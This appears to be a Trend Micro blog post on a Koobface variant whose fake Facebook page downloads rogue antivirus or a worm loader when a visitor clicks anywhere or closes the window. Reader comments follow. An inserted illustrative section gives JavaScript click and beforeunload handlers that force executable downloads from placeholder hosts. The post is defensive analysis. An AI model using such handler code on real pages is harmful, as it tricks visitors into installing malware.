
    The Koobface botnet is widely known to install FAKEAV or rogue antivirus malware onto a victim’s PC. It has a dedicated component which actually installs the FAKEAV onto the user’s system. However, the Koobface gang has added a new twist to its fake Facebook page.

    When the user closes the window/tab with the fake Facebook page, a popup window appears. Whatever button the user clicks, this new Koobface variant is downloaded onto the affected system. Here’s a video that illustrates this behavior:

    This is the script the cybercriminals use to perform this new routine; it works only for users who visited the fake page with Internet Explorer:

    Figure 1. Koobface Script

    The script above leaves the user with very little choice: closing the browser window downloads a FAKEAV variant (detected as TROJ_FAKEAV.FGR), while clicking anywhere on the web page downloads a Koobface loader (detected as WORM_KOOBFACE.AZ).
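    As an added illustration (this is not code from the original post and not the script in Figure 1, which is not reproduced here), the JavaScript below models the two behaviours the post describes: every click on the page, whatever element or button label it lands on, leads to one download, and closing the window leads to another. The wiring to a document-level `click` listener and the window's `beforeunload` event is an assumption about how such a page would be built, and the download URLs are constructed placeholders on a reserved domain, not real Koobface infrastructure. A tiny EventTarget stub is included so the logic runs under Node without a browser.

```javascript
// Added illustration of the behaviour the post describes; this is NOT the
// Koobface script shown in Figure 1, whose exact code is not reproduced here.
// Assumptions: the page hooks a document-level click and the window's
// beforeunload event. URLs are constructed placeholders on a reserved domain.
const DOWNLOADS = {
  click: "http://example.invalid/koobface-loader.exe", // stand-in for WORM_KOOBFACE.AZ
  close: "http://example.invalid/fakeav-setup.exe",    // stand-in for TROJ_FAKEAV.FGR
};

// Map a DOM event to the payload it would trigger. The click branch never
// inspects event.target: any element, whatever its caption, leads to the loader.
function decide(event) {
  if (event.type === "click") return DOWNLOADS.click;
  if (event.type === "beforeunload" || event.type === "unload") return DOWNLOADS.close;
  return null;
}

// Register the handlers on window/document-like objects. In a browser you
// would pass the real `window`; `navigate` stands in for `location.href = url`.
function install(win, navigate) {
  win.document.addEventListener("click", (ev) => navigate(decide(ev)));
  win.addEventListener("beforeunload", (ev) => navigate(decide(ev)));
}

// Minimal EventTarget stub so the wiring can run and be checked under Node.
function makeTarget() {
  const listeners = {};
  return {
    addEventListener(type, fn) {
      if (!listeners[type]) listeners[type] = [];
      listeners[type].push(fn);
    },
    dispatch(type, target) {
      for (const fn of listeners[type] || []) fn({ type, target });
    },
  };
}

// Replay a victim's session: two attempts to dismiss the popup by clicking
// "Close" and "Cancel", then closing the tab. Returns the URLs the page
// would have navigated to, in order.
function simulate() {
  const visited = [];
  const win = makeTarget();
  win.document = makeTarget();
  install(win, (url) => { if (url) visited.push(url); });
  win.document.dispatch("click", { tagName: "BUTTON", textContent: "Close" });
  win.document.dispatch("click", { tagName: "BUTTON", textContent: "Cancel" });
  win.dispatch("beforeunload", null);
  return visited;
}

console.log(simulate());
```

    Run it with `node` and the three visited URLs print in order: loader, loader, FAKEAV installer. The defensive reading is that a button's caption says nothing about what its handler does; the only action no page script can intercept is ending the browser process rather than clicking anything on the page.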

    • abitowhit

      Does killing all IE processes abort over clicking on anything? A button is a button is a button; just 'cuz it says close, abort, quit or donottinfectme does not mean it will close, abort, quit or notinfectme. :)


    • http://kerry.is-a-geek.org/upoccasionally Kerry

      Tons of people are falling for this. I have seen literally dozens of customers infected with Koobface and whatever flavor of rogue AV/AS is out this week. Looking for the installer for Green AV, SoftSave, and the latest Quick Heal Cleaner.

    • becca

      Help, I got the fake AV. How do I get rid of it? I updated from my 08 antivirus plus antispyware to the 2010 version but don't think that got rid of it. Best Buy, where I bought everything including their Black Tie Protection 12/2008, informed me today that it'll cost me $200 for them to do it!!!! Can you please tell me how to get rid of it?

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice